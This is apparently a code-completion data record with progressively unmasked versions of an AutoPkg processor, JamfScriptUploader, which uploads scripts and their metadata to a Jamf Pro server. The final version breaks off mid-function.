"step-1": "<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': False,\n 'description': 'Script parameter 9 title', 
'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n self.output(script_data, verbose_level=2)\n script_json = 
self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = self.env.get('replace_script')\n self.sleep = 
self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. 
Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\n<mask token>\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': 
False,\n 'description': 'Script parameter 9 title', 'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n 
self.output(script_data, verbose_level=2)\n script_json = self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = 
self.env.get('replace_script')\n self.sleep = self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. 
Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\nif __name__ == '__main__':\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-4": "<mask token>\nimport os.path\nimport sys\nfrom time import sleep\nfrom autopkglib import ProcessorError\nsys.path.insert(0, os.path.dirname(__file__))\nfrom JamfUploaderLib.JamfUploaderBase import JamfUploaderBase\n__all__ = ['JamfScriptUploader']\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n 'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'\n )\n input_variables = {'JSS_URL': {'required': True, 'description':\n 'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_USERNAME': {'required': True, 'description':\n 'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'\n }, 'API_PASSWORD': {'required': True, 'description':\n 'Password of api user, optionally set as a key in the com.github.autopkg preference file.'\n }, 'script_path': {'required': False, 'description':\n 'Full path to the script to be uploaded'}, 'script_name': {\n 'required': False, 'description': 'Name of the script in Jamf'},\n 'script_category': {'required': False, 'description':\n 'Script category', 'default': ''}, 'script_priority': {'required': \n False, 'description': 'Script priority (BEFORE or AFTER)',\n 'default': 'AFTER'}, 'osrequirements': {'required': False,\n 'description': 'Script OS requirements', 'default': ''},\n 'script_info': {'required': False, 'description':\n 'Script info field', 'default': ''}, 'script_notes': {'required': \n False, 'description': 'Script notes field', 'default': ''},\n 'script_parameter4': {'required': False, 'description':\n 'Script parameter 4 title', 'default': ''}, 'script_parameter5': {\n 'required': False, 'description': 'Script parameter 5 title',\n 'default': ''}, 'script_parameter6': {'required': False,\n 'description': 'Script parameter 6 title', 'default': ''},\n 'script_parameter7': {'required': False, 'description':\n 'Script 
parameter 7 title', 'default': ''}, 'script_parameter8': {\n 'required': False, 'description': 'Script parameter 8 title',\n 'default': ''}, 'script_parameter9': {'required': False,\n 'description': 'Script parameter 9 title', 'default': ''},\n 'script_parameter10': {'required': False, 'description':\n 'Script parameter 10 title', 'default': ''}, 'script_parameter11':\n {'required': False, 'description': 'Script parameter 11 title',\n 'default': ''}, 'replace_script': {'required': False, 'description':\n 'Overwrite an existing script if True.', 'default': False}, 'sleep':\n {'required': False, 'description':\n 'Pause after running this processor for specified seconds.',\n 'default': '0'}}\n output_variables = {'script_name': {'required': False, 'description':\n 'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':\n {'description': 'Description of interesting results.'}}\n\n def upload_script(self, jamf_url, script_name, script_path, category_id,\n script_category, script_info, script_notes, script_priority,\n script_parameter4, script_parameter5, script_parameter6,\n script_parameter7, script_parameter8, script_parameter9,\n script_parameter10, script_parameter11, script_os_requirements,\n token, obj_id=0):\n \"\"\"Update script metadata.\"\"\"\n if os.path.exists(script_path):\n with open(script_path, 'r') as file:\n script_contents = file.read()\n else:\n raise ProcessorError('Script does not exist!')\n script_contents = self.substitute_assignable_keys(script_contents)\n if script_priority:\n script_priority = script_priority.upper()\n script_data = {'name': script_name, 'info': script_info, 'notes':\n script_notes, 'priority': script_priority, 'categoryId':\n category_id, 'categoryName': script_category, 'parameter4':\n script_parameter4, 'parameter5': script_parameter5,\n 'parameter6': script_parameter6, 'parameter7':\n script_parameter7, 'parameter8': script_parameter8,\n 'parameter9': script_parameter9, 'parameter10':\n script_parameter10, 
'parameter11': script_parameter11,\n 'osRequirements': script_os_requirements, 'scriptContents':\n script_contents}\n self.output('Script data:', verbose_level=2)\n self.output(script_data, verbose_level=2)\n script_json = self.write_json_file(script_data)\n self.output('Uploading script..')\n object_type = 'script'\n if obj_id:\n url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(\n object_type), obj_id)\n else:\n url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))\n count = 0\n while True:\n count += 1\n self.output('Script upload attempt {}'.format(count),\n verbose_level=2)\n request = 'PUT' if obj_id else 'POST'\n r = self.curl(request=request, url=url, token=token, data=\n script_json)\n if self.status_check(r, 'Script', script_name, request) == 'break':\n break\n if count > 5:\n self.output('Script upload did not succeed after 5 attempts')\n self.output('\\nHTTP POST Response Code: {}'.format(r.\n status_code))\n raise ProcessorError('ERROR: Script upload failed ')\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get('JSS_URL')\n self.jamf_user = self.env.get('API_USERNAME')\n self.jamf_password = self.env.get('API_PASSWORD')\n self.script_path = self.env.get('script_path')\n self.script_name = self.env.get('script_name')\n self.script_category = self.env.get('script_category')\n self.script_priority = self.env.get('script_priority')\n self.osrequirements = self.env.get('osrequirements')\n self.script_info = self.env.get('script_info')\n self.script_notes = self.env.get('script_notes')\n self.script_parameter4 = self.env.get('script_parameter4')\n self.script_parameter5 = self.env.get('script_parameter5')\n self.script_parameter6 = self.env.get('script_parameter6')\n self.script_parameter7 = self.env.get('script_parameter7')\n self.script_parameter8 = self.env.get('script_parameter8')\n self.script_parameter9 = 
self.env.get('script_parameter9')\n self.script_parameter10 = self.env.get('script_parameter10')\n self.script_parameter11 = self.env.get('script_parameter11')\n self.replace = self.env.get('replace_script')\n self.sleep = self.env.get('sleep')\n if not self.replace or self.replace == 'False':\n self.replace = False\n if 'jamfscriptuploader_summary_result' in self.env:\n del self.env['jamfscriptuploader_summary_result']\n script_uploaded = False\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.\n jamf_password)\n if self.script_category:\n self.output('Checking categories for {}'.format(self.\n script_category))\n obj_type = 'category'\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(self.jamf_url,\n obj_type, obj_name, token)\n if not category_id:\n self.output('WARNING: Category not found!')\n category_id = '-1'\n else:\n self.output('Category {} found: ID={}'.format(self.\n script_category, category_id))\n else:\n self.script_category = ''\n category_id = '-1'\n if not self.script_path.startswith('/'):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(\n f'ERROR: Script file {self.script_path} not found')\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n self.output(\"Checking for existing '{}' on {}\".format(self.\n script_name, self.jamf_url))\n self.output('Full path: {}'.format(self.script_path), verbose_level=2)\n obj_type = 'script'\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,\n obj_name, token)\n if obj_id:\n self.output(\"Script '{}' already exists: ID {}\".format(self.\n script_name, obj_id))\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\"\n .format(self.replace), verbose_level=1)\n else:\n self.output(\n \"Not replacing existing script. 
Use replace_script='True' to enforce.\"\n , verbose_level=1)\n return\n self.upload_script(self.jamf_url, self.script_name, self.\n script_path, category_id, self.script_category, self.\n script_info, self.script_notes, self.script_priority, self.\n script_parameter4, self.script_parameter5, self.\n script_parameter6, self.script_parameter7, self.\n script_parameter8, self.script_parameter9, self.\n script_parameter10, self.script_parameter11, self.\n osrequirements, token, obj_id)\n script_uploaded = True\n self.env['script_name'] = self.script_name\n self.env['script_uploaded'] = script_uploaded\n if script_uploaded:\n self.env['jamfscriptuploader_summary_result'] = {'summary_text':\n 'The following scripts were created or updated in Jamf Pro:',\n 'report_fields': ['script', 'path', 'category', 'priority',\n 'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',\n 'P9', 'P10', 'P11'], 'data': {'script': self.script_name,\n 'path': self.script_path, 'category': self.script_category,\n 'priority': str(self.script_priority), 'info': self.\n script_info, 'os_req': self.osrequirements, 'notes': self.\n script_notes, 'P4': self.script_parameter4, 'P5': self.\n script_parameter5, 'P6': self.script_parameter6, 'P7': self\n .script_parameter7, 'P8': self.script_parameter8, 'P9':\n self.script_parameter9, 'P10': self.script_parameter10,\n 'P11': self.script_parameter11}}\n\n\nif __name__ == '__main__':\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-5": "#!/usr/local/autopkg/python\n\n\"\"\"\nJamfScriptUploader processor for uploading items to Jamf Pro using AutoPkg\n by G Pugh\n\"\"\"\n\nimport os.path\nimport sys\n\nfrom time import sleep\nfrom autopkglib import ProcessorError # pylint: disable=import-error\n\n# to use a base module in AutoPkg we need to add this path to the sys.path.\n# this violates flake8 E402 (PEP8 imports) but is unavoidable, so the following\n# imports require noqa comments for E402\nsys.path.insert(0, os.path.dirname(__file__))\n\nfrom JamfUploaderLib.JamfUploaderBase import JamfUploaderBase # noqa: E402\n\n__all__ = [\"JamfScriptUploader\"]\n\n\nclass JamfScriptUploader(JamfUploaderBase):\n description = (\n \"A processor for AutoPkg that will upload a script to a Jamf Cloud or \"\n \"on-prem server.\"\n )\n input_variables = {\n \"JSS_URL\": {\n \"required\": True,\n \"description\": \"URL to a Jamf Pro server that the API user has write access \"\n \"to, optionally set as a key in the com.github.autopkg \"\n \"preference file.\",\n },\n \"API_USERNAME\": {\n \"required\": True,\n \"description\": \"Username of account with appropriate access to \"\n \"jss, optionally set as a key in the com.github.autopkg \"\n \"preference file.\",\n },\n \"API_PASSWORD\": {\n \"required\": True,\n \"description\": \"Password of api user, optionally set as a key in \"\n \"the com.github.autopkg preference file.\",\n },\n \"script_path\": {\n \"required\": False,\n \"description\": \"Full path to the script to be uploaded\",\n },\n \"script_name\": {\n \"required\": False,\n \"description\": \"Name of the script in Jamf\",\n },\n \"script_category\": {\n \"required\": False,\n \"description\": \"Script category\",\n \"default\": \"\",\n },\n \"script_priority\": {\n \"required\": False,\n \"description\": \"Script priority (BEFORE or AFTER)\",\n \"default\": \"AFTER\",\n },\n \"osrequirements\": {\n \"required\": False,\n \"description\": \"Script OS requirements\",\n \"default\": \"\",\n },\n 
\"script_info\": {\n \"required\": False,\n \"description\": \"Script info field\",\n \"default\": \"\",\n },\n \"script_notes\": {\n \"required\": False,\n \"description\": \"Script notes field\",\n \"default\": \"\",\n },\n \"script_parameter4\": {\n \"required\": False,\n \"description\": \"Script parameter 4 title\",\n \"default\": \"\",\n },\n \"script_parameter5\": {\n \"required\": False,\n \"description\": \"Script parameter 5 title\",\n \"default\": \"\",\n },\n \"script_parameter6\": {\n \"required\": False,\n \"description\": \"Script parameter 6 title\",\n \"default\": \"\",\n },\n \"script_parameter7\": {\n \"required\": False,\n \"description\": \"Script parameter 7 title\",\n \"default\": \"\",\n },\n \"script_parameter8\": {\n \"required\": False,\n \"description\": \"Script parameter 8 title\",\n \"default\": \"\",\n },\n \"script_parameter9\": {\n \"required\": False,\n \"description\": \"Script parameter 9 title\",\n \"default\": \"\",\n },\n \"script_parameter10\": {\n \"required\": False,\n \"description\": \"Script parameter 10 title\",\n \"default\": \"\",\n },\n \"script_parameter11\": {\n \"required\": False,\n \"description\": \"Script parameter 11 title\",\n \"default\": \"\",\n },\n \"replace_script\": {\n \"required\": False,\n \"description\": \"Overwrite an existing script if True.\",\n \"default\": False,\n },\n \"sleep\": {\n \"required\": False,\n \"description\": \"Pause after running this processor for specified seconds.\",\n \"default\": \"0\",\n },\n }\n\n output_variables = {\n \"script_name\": {\n \"required\": False,\n \"description\": \"Name of the uploaded script\",\n },\n \"jamfscriptuploader_summary_result\": {\n \"description\": \"Description of interesting results.\",\n },\n }\n\n def upload_script(\n self,\n jamf_url,\n script_name,\n script_path,\n category_id,\n script_category,\n script_info,\n script_notes,\n script_priority,\n script_parameter4,\n script_parameter5,\n script_parameter6,\n script_parameter7,\n 
script_parameter8,\n script_parameter9,\n script_parameter10,\n script_parameter11,\n script_os_requirements,\n token,\n obj_id=0,\n ):\n \"\"\"Update script metadata.\"\"\"\n\n # import script from file and replace any keys in the script\n if os.path.exists(script_path):\n with open(script_path, \"r\") as file:\n script_contents = file.read()\n else:\n raise ProcessorError(\"Script does not exist!\")\n\n # substitute user-assignable keys\n script_contents = self.substitute_assignable_keys(script_contents)\n\n # priority has to be in upper case. Let's make it nice for the user\n if script_priority:\n script_priority = script_priority.upper()\n\n # build the object\n script_data = {\n \"name\": script_name,\n \"info\": script_info,\n \"notes\": script_notes,\n \"priority\": script_priority,\n \"categoryId\": category_id,\n \"categoryName\": script_category,\n \"parameter4\": script_parameter4,\n \"parameter5\": script_parameter5,\n \"parameter6\": script_parameter6,\n \"parameter7\": script_parameter7,\n \"parameter8\": script_parameter8,\n \"parameter9\": script_parameter9,\n \"parameter10\": script_parameter10,\n \"parameter11\": script_parameter11,\n \"osRequirements\": script_os_requirements,\n \"scriptContents\": script_contents,\n }\n\n self.output(\n \"Script data:\",\n verbose_level=2,\n )\n self.output(\n script_data,\n verbose_level=2,\n )\n\n script_json = self.write_json_file(script_data)\n\n self.output(\"Uploading script..\")\n\n # if we find an object ID we put, if not, we post\n object_type = \"script\"\n if obj_id:\n url = \"{}/{}/{}\".format(jamf_url, self.api_endpoints(object_type), obj_id)\n else:\n url = \"{}/{}\".format(jamf_url, self.api_endpoints(object_type))\n\n count = 0\n while True:\n count += 1\n self.output(\n \"Script upload attempt {}\".format(count),\n verbose_level=2,\n )\n request = \"PUT\" if obj_id else \"POST\"\n r = self.curl(request=request, url=url, token=token, data=script_json)\n # check HTTP response\n if 
self.status_check(r, \"Script\", script_name, request) == \"break\":\n break\n if count > 5:\n self.output(\"Script upload did not succeed after 5 attempts\")\n self.output(\"\\nHTTP POST Response Code: {}\".format(r.status_code))\n raise ProcessorError(\"ERROR: Script upload failed \")\n if int(self.sleep) > 30:\n sleep(int(self.sleep))\n else:\n sleep(30)\n return r\n\n def main(self):\n \"\"\"Do the main thing here\"\"\"\n self.jamf_url = self.env.get(\"JSS_URL\")\n self.jamf_user = self.env.get(\"API_USERNAME\")\n self.jamf_password = self.env.get(\"API_PASSWORD\")\n self.script_path = self.env.get(\"script_path\")\n self.script_name = self.env.get(\"script_name\")\n self.script_category = self.env.get(\"script_category\")\n self.script_priority = self.env.get(\"script_priority\")\n self.osrequirements = self.env.get(\"osrequirements\")\n self.script_info = self.env.get(\"script_info\")\n self.script_notes = self.env.get(\"script_notes\")\n self.script_parameter4 = self.env.get(\"script_parameter4\")\n self.script_parameter5 = self.env.get(\"script_parameter5\")\n self.script_parameter6 = self.env.get(\"script_parameter6\")\n self.script_parameter7 = self.env.get(\"script_parameter7\")\n self.script_parameter8 = self.env.get(\"script_parameter8\")\n self.script_parameter9 = self.env.get(\"script_parameter9\")\n self.script_parameter10 = self.env.get(\"script_parameter10\")\n self.script_parameter11 = self.env.get(\"script_parameter11\")\n self.replace = self.env.get(\"replace_script\")\n self.sleep = self.env.get(\"sleep\")\n # handle setting replace in overrides\n if not self.replace or self.replace == \"False\":\n self.replace 